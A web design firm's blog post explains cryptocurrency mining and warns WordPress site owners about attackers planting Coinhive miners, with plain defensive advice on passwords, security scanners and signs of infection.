If you own or maintain a WordPress website, you may have recently received information that rogue agents are uploading cryptocurrency mining software. As a Birmingham website designer, we thought we’d let our current clients and other people know more information about the attack.

So what is cryptocurrency mining? Well for those who haven’t seen the hype, cryptocurrency is a digital form of exchange that had its concept proven with the now infamous Bitcoin. Cryptocurrency are usually a decentralised system, which means governments or other institutions are unable to stop its operation. The way that it stays decentralised is through individual computers running software to maintain its digital ledger of transactions. The computers use processing power to complete a series of math problems and the one that succeeds first is rewarded with cryptocurrency. The process is termed “mining” as it is essentially obtaining reward through the process.

The story of mining is reflective of the wider political processes associated with cryptocurrency. When they were unheard of, the difficulty of the mining process was low, and therefore individuals could mine cryptocurrency on their individual computers. As more people mine the cryptocurrency, they become more difficult and therefore require more computing power. With Bitcoin this has resulted in highly centralised operations requiring extensive capital investments in processing power. It sort of defeats the point of Bitcoin, as the decentralisation has resulted in greater centralisation, as only a few groups have access to the capacity to mine competitively.

The requirement of more processing power is where the WordPress attack comes in. Individuals have become quite ingenious at working out methods of using other people’s computing power to mine for cryptocurrency. One of the most famous approaches was through the torrent site; uTorrent. Back in 2015 they were using the computing power of the people who downloaded their software to mine for cryptocurrency. They were doing it quite blatantly as well, stating the fact in the terms and conditions. Users would download uTorrent to share their favourite pirated material, and as uTorrent used some processing power anyway, they did not notice the extra used for cryptocurrency mining. uTorrent would then reap the rewards for their users processing power. The approach applied by uTorrent is now widespread. Only recently Pirate Bay and Showtime have been caught secretly mining cryptocurrency using the computing power of visitors to their site, with some experts estimating 500million computers are infected. The recent WordPress attack is basically miners getting access to your backend, installing mining software and using your visitors processing capacity to obtain cryptocurrency.

To give you an example of how this works. Coinhive is a service where you can attach mining software for the cryptocurrency Monero to links, websites or even verification processes. There are legitimate reasons to do this; spam protection and revenue from link forwarding. The link provided above goes through a forwarding process where I mine cryptocurrency from your processor, before you access the site. It only works in certain situations, there is no point of doing it if someone is going to access the link via their mobile phone, as the processing power is so low. Which probably why Pirate Bay are using it, as most people access their sites with PCs. Here’s the Coinhive link without the mining process.

So how do you recognise it within your own WordPress site? Well basically it comes down to how secure your site is. Firstly, ensure that admin passwords are strong, as this attack is unusual. Once they gain access to your site and install the mining software, they will leave everything looking normal. They do not want you to become suspicious about an attack, they want to mine cryptocurrency from your users. A strong password is 16+ letters, numbers and symbols. Secondly, run WordPress security plugins that ensure that your site is protected. A free one is Wordfence. Coinhive is a line of code, opposed to an addition you will recognise in your usual menu, so you will need scans to find it. Wordfence is now aware of the attack and you will get the following warning is someone is using Coinhive to mine using your site:

If you want a less intrusive method to see if you have been hacked, we would recommend the free service GravityScan. This analyses your site externally and looks for malware. The error message for this system looks like this:

Finally, we must be aware that attacks in this way are basically an arms race. Once we realise how to stop one method, attackers are using a different method. One of the ways to identify if your site is being used to mine for cryptocurrency is a reduction in site performance. If the site takes a very long time to load up, especially on mobile phones, without explanation, it is worth investigating.

So what to do if you have been attacked? I’m sorry, this is where the blog may sound a little sales-pitchy, but there is no other way. Ultimately there is three problems that need investigating; how the attackers gained access, where the code is now situated and what is the best method for removing it. This process is bespoke to your website and cannot be explained in a blog. If you fear you are infected, either contact your website provider or contact us. As a Birmingham website designer, we would be happy to advise you on solving your issue.

Thanks for reading.